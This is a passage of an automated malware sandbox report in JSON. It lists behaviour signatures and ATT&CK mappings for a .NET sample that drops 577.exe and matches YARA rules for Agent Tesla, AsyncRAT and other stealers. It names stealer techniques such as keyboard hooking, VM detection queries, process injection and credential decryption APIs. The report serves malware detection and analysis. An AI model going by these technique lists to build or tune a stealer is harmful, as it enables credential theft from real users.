\"System.Security.Cryptography.LSVL92cvCCtoQgBtKWf1+i5I8y9HKW0pJTFuLS1tL21yRS1kLS9tKW0pJC0DQC9uK20pJT5eKi/HKW0pCC1uPAdxK20vVgdBLV9Fd20pLgU1LS9nBGwDDIxuLSVhO29bEAJuXQfPKW0jLiscdwBtWUW4JC1kOwdAK20vLyscdwBtWUW4JC1kBZZtKWdXECxuKTTgJ20pJQh4X0tCKR2LATpoX7RsKR1blghuXUD0KW0jVu9ILV8fX0opVEL3LS9ni0gxVldBLV/PDHQuhgh0X69CKR2LDHBuLSVFk20pLlNaLC9pAfErJCtELS9+GWkprC1uLQJtKXxXECxuKQfEKW0jCSscLC9tWUdXECxuKQfQKW0jDCNuLQRyI0UmJC1FBSFtKUYBNC1uBiVrRuMpJCdxJwF6W+sGJF1oQqFtKWelNy1uLAesKW0jDzgcvwBtWWtGqi1uJ6N+KW0oDOxuLSVmW1MOJF1oBe1tKWclVodBLV9qW70GJF1mBVxtKWcD.CreateDecryptor\" in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-358", "type": 2, "relevance": 1, "name": "Contains ability to encrypt data using RSA (Dotnet String)", "description": "Observed string: \"System.Security.Cryptography.RSACryptoServiceProvider.BCryptEncrypt\" in Source: 00000000-00005100.00000001.132927.00352000.00000020.mdmp", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-212", "type": 2, "relevance": 1, "name": "Contains ability to perform decryption (API string)", "description": "Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() (get size) failed with status code: {0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt(): authentication tag mismatch\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"Crypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-438", "type": 2, "relevance": 3, "name": "Contains ability to perform AES/RC4 encryption (API string)", "description": "Found reference to API \"BCryptGetProperty\" (Indicator: \"BCryptGetProperty\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptSetProperty\" (Indicator: \"BCryptSetProperty\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptImportKey\" (Indicator: \"CryptImportKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDestroyKey\" (Indicator: \"BCryptDestroyKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDestroyKey\" (Indicator: \"CryptDestroyKey\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptEncrypt\" (Indicator: \"BCryptEncrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptEncrypt\" (Indicator: \"CryptEncrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"BCryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCryptDecrypt\" (Indicator: \"CryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CryptUnprotectData\" (Indicator: \"CryptUnprotectData\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"BCryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"BCrypt.BCryptDecrypt() failed with status code:{0}\" (Indicator: \"CryptDecrypt\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-280", "type": 2, "relevance": 1, "name": "Contains reference to cryptographic keys", "description": "Found string \"http://www.w3.org/2001/04/xmlenc# EncryptedKey\" (Indicator: \"encryptedkey\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")\n Found string \"System.Security.Cryptography.Xml.KeyInfoEncryptedKey, System.Security, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" (Indicator: \"encryptedkey\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "string-108", "type": 2, "relevance": 1, "name": "Contains ability to perform encryption (API string)", "description": "Found reference to API \"onfiguration, Version=<IPv4>, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" description=\"Uses CryptProtectData and CryptUnProtect\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00001916.00000000.130655.00490000.00000004.mdmp, 00000000-00001916.00000001.131430.00490000.00000004.mdmp\")\n Found reference to API \"description=\"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\"\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp\")\n Found reference to API \"Uses CryptProtectData and CryptUnProtectData Windows APIs to encrypt and decrypt\" (Indicator: \"CryptProtectData\"; Source: \"00000000-00005100.00000000.131007.01A60000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-106", "relevance": 1, "name": "Contains ability to decode string content at runtime (Dotnet)", "description": "Observed function \"FromBase64String\" in \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07\"\n Observed function \"FromBase64String\" in \"577.exe\"\n Observed function \"ToBase64String\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-118", "relevance": 1, "name": "Contains ability to perform crypto operations", "description": "Observed namespace \"System.Security.Cryptography.X509Certificates\" in [Source: \"577.exe\"]\n Observed namespace \"System.Security.Cryptography\" in [Source: \"577.exe\"]", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-166", "relevance": 1, "name": "Contains ability to perform CryptoStream operations (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.CryptoStream\" and TypeReference \"FlushFinalBlock\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-140", "relevance": 1, "name": "Contains ability to perform symmetric crypto operations", "description": "Observed namespace \"System.Security.Cryptography.RijndaelManaged\" and TypeReference \".ctor\" in \"577.exe\"\n Observed namespace \"System.Security.Cryptography.AesCryptoServiceProvider\" and TypeReference \".ctor\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-141", "relevance": 1, "name": "Contains ability to perform asymmetric crypto operations", "description": "Observed namespace \"System.Security.Cryptography.RSACryptoServiceProvider\" and TypeReference \"VerifyHash\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-168", "relevance": 1, "name": "Contains ability to perform symmetric decryption (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.SymmetricAlgorithm\" and TypeReference \"CreateDecryptor\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "static-165", "relevance": 1, "name": "Contains ability to perform symmetric encryption (Dotnet)", "description": "Observed namespace \"System.Security.Cryptography.SymmetricAlgorithm\" and TypeReference \"CreateEncryptor\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-32", "type": 15, "relevance": 1, "name": "Shows ability to deobfuscate/decode files or information", "description": "The analysis shows use of encryption and can be used to decode file or information. Matched sigs: Contains ability to decode base64 data", "origin": "Indicator Combinations", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140"}, {"threat_level_human": "informative", "category": "Cryptographic Related", "identifier": "summary-28", "type": 15, "relevance": 1, "name": "Shows ability to obfuscate file or information", "description": "The analysis contains indicators for cyrpto or data obfuscation(base64/decrypt) which can hide information. Matched sigs: Contains CRYPTO related strings\n Matched sigs: Contains ability to use Cryptographic classes\n Matched sigs: Contains ability to decode base64 data\n Matched sigs: Contains ability to perform encryption/decryption using RSA algorithm\n Matched sigs: Contains ability to decrypt data using RSA (Dotnet String)\n Matched sigs: Contains ability to decrypt/decode data\n Matched sigs: Contains ability to perform AES decryption (Dotnet String)\n Matched sigs: Contains ability to encrypt data using RSA (Dotnet String)\n Matched sigs: Contains ability to use Microsoft's Enhanced Cryptographic Provider\n Matched sigs: Contains asymmetric cryptographic functions (API string)\n Matched sigs: Contains ability to perform decryption (API string)\n Matched sigs: Contains ability to perform AES/RC4 encryption (API string)\n Matched sigs: Contains ability to import cryptographic keys (seen in ransomware)\n Matched sigs: Found Crypto currency wallets related strings\n Matched sigs: Contains key cryptographic functions (API string)\n Matched sigs: Contains reference to cryptographic keys\n Matched sigs: Contains ability to perform encryption (API string)\n Matched sigs: Reads the cryptographic machine GUID\n Matched sigs: Contains ability to decode string content at runtime (Dotnet)\n Matched sigs: Contains ability to perform crypto operations\n Matched sigs: Contains ability to perform CryptoStream operations (Dotnet)\n Matched sigs: Contains ability to perform symmetric crypto operations\n Matched sigs: Dotnet file contains encryption/decryption functions\n Matched sigs: Contains ability to perform asymmetric crypto operations\n Matched sigs: Contains ability to perform symmetric decryption (Dotnet)\n Matched sigs: Contains ability to perform symmetric encryption (Dotnet)", "origin": "Indicator Combinations", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-91", "type": 2, "relevance": 1, "name": "Contains ability to hook/unhook windows functions (API string)", "description": "Found reference to API \"SetWindowsHookEx\" (Indicator: \"SetWindowsHook\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"SetWindowsHookEx\" (Indicator: \"SetWindowsHook\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n Found reference to API \"SetWindowsHookEx\" (Indicator: \"SetWindowsHook\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"UnhookWindowsHookEx\" (Indicator: \"UnhookWindowsHook\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n Found reference to API \"CallNextHookEx\" (Indicator: \"CallNextHook\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-77", "type": 2, "relevance": 1, "name": "Contains ability to modify access token privileges (API string)", "description": "Found reference to API \"SeDebugPrivilegeCulture=neutral, PublicKeyToken=b03f5f7f11d50a3a\" />\" (Indicator: \"SeDebugPrivilege\"; Source: \"00000000-00005100.00000001.132927.00420000.00000004.mdmp\n 00000000-00005100.00000002.134853.00420000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"\\Device\\KsecDD\"\n \"577.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00001916.00000000.130655.00490000.00000004.mdmp, 00000000-00001916.00000001.131430.00490000.00000004.mdmp\")\n Found string \"system32\\drivers\\Netmon.sys\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00001916.00000000.130655.00DD0000.00000002.mdmp\")\n Found string \"system32\\drivers\\Netmon.sys\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00001916.00000000.130655.00DD0000.00000002.mdmp\")\n Found string \"o C:\\Windows\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00001916.00000000.130655.00DD0000.00000002.mdmp\")\n Found string \"\\Device\\HarddiskVolume2\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll\" (Indicator: \"\\Device\\\"; Source: \"00000000-00005100.00000000.131007.00420000.00000004.mdmp, 00000000-00005100.00000001.132927.00420000.00000004.mdmp, 00000000-00005100.00000002.134853.00420000.00000004.mdmp\")\n Found string \"system32\\drivers\\Netmon.sys\" (Indicator: \"\\drivers\\\"; Source: \"00000000-00005100.00000000.131007.00E60000.00000002.mdmp, 00000000-00005100.00000001.132927.00E60000.00000002.mdmp, 00000000-00005100.00000002.134853.00E60000.00000002.mdmp\")\n Found string \"system32\\drivers\\Netmon.sys\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005100.00000000.131007.00E60000.00000002.mdmp, 00000000-00005100.00000001.132927.00E60000.00000002.mdmp, 00000000-00005100.00000002.134853.00E60000.00000002.mdmp\")\n Found string \"o C:\\Windows\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00005100.00000000.131007.00E60000.00000002.mdmp, 00000000-00005100.00000001.132927.00E60000.00000002.mdmp, 00000000-00005100.00000002.134853.00E60000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-111", "type": 6, "relevance": 3, "name": "Calls an API typically used to enable or disable privileges in the specified access token", "description": "\"577.exe\" called an API \"AdjustTokenPrivileges\"on file: C:\\Windows\\System32\\sspicli.dll\" (UID: 00000000-00005100)", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" wrote 48128 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"577.exe\" has type \"PE32 executable (GUI) Intel 80386 Mono/.Net assembly for MS Windows\"- Location: [%TEMP%\\577.exe]- [targetUID: 00000000-00001916]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" at 00000000-00001916-00000105-16663371\n \"577.exe\" at 00000000-00005100-00000105-4943075", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Detection/Stealthyness", "identifier": "static-161", "relevance": 1, "name": "Contains ability execute applications in hidden mode (Dotnet)", "description": "Observed Namespace \"System.Diagnostics.ProcessStartInfo\" and MemberReference \"set_CreateNoWindow\" in \"577.exe\"", "origin": "Static Parser", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "string-55", "type": 2, "relevance": 10, "name": "Found a reference to a WMI query string known to be used for VM detection", "description": "\"Select ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"from Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; File: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"SELECT * FROM win32_operatingsystem\" (Indicator: \" win32_operatingsystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"elect ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"ELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"ELECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"elect * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"ELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" win32_pnpentity\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"elect * from Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00001916.00000001.131430.02DF0000.00000004.mdmp\")\n \"SELECT * FROM win32_operatingsystem\" (Indicator: \" win32_operatingsystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"elect ProcessorId From Win32_processor\" (Indicator: \" win32_process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"ELECT * FROM Win32_Processor\" (Indicator: \" win32_process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"ELECT * FROM Win32_VideoController\" (Indicator: \" win32_videocontroller\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"elect * From Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" win32_process\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"ELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" win32_pnpentity\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")\n \"elect * from Win32_ComputerSystem\" (Indicator: \" win32_computersystem\"; Source: \"00000000-00005100.00000001.132927.00352000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"577.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\sspicli.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\security.config.cch.1916.908370296\" with delete access\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\config\\enterprisesec.config.cch.1916.908370296\" with delete access\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\SECURITY.CONFIG.CCH.1916.908370296\" with delete access\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\ENTERPRISESEC.CONFIG.CCH.1916.908370296\" with delete access\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\CLR SECURITY CONFIG\\V2.0.50727.312\\SECURITY.CONFIG.CCH.1916.908370499\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-133", "type": 13, "relevance": 10, "name": "YARA signature match – WorldWind stealer", "description": "YARA signature WorldWind stealer matched on process \"00000000-00001916\"\n YARA signature WorldWind stealer matched on file \"577.exe\"\n YARA signature WorldWind stealer matched on process \"00000000-00005100\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-4", "type": 13, "relevance": 9, "name": "YARA signature match - Agent Tesla", "description": "YARA signature Malware.Agent Tesla matched on process \"00000000-00001916\"\n YARA signature Malware.Agent Tesla matched on file \"577.exe\"\n YARA signature Malware.Agent Tesla matched on process \"00000000-00005100\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-8", "type": 13, "relevance": 10, "name": "YARA signature match - generic stealer", "description": "YARA signature Malware.Stealer matched on file \"577.exe\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-6", "type": 13, "relevance": 10, "name": "YARA signature match - AsyncRAT", "description": "YARA signature Malware.AsyncRAT matched on file \"577.exe\"", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Pattern Matching", "identifier": "yara-0", "type": 13, "relevance": 9, "name": "YARA signature match", "description": "YARA signature \"win_njrat_g0\" matched file \"577.exe\" (Author: Various authors / Slavo Greminger, SWITCH-CERT)\n YARA signature \"MALWARE_Win_StormKitty\" matched file \"577.exe\" as \"Detects StormKitty infostealer\" (Author: ditekSHen)", "origin": "YARA Signature"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" allocated memory in \"C:\\e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\" (Handle: 404)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\" (Handle: 404)\n \"e9fa1a5ebe7068f630d2612f51ab789df437c06a6a345ab34d834986ea503b07.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\577.exe\" (Handle: 404)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "string-11", "type": 2, "relevance": 6, "name": "Found 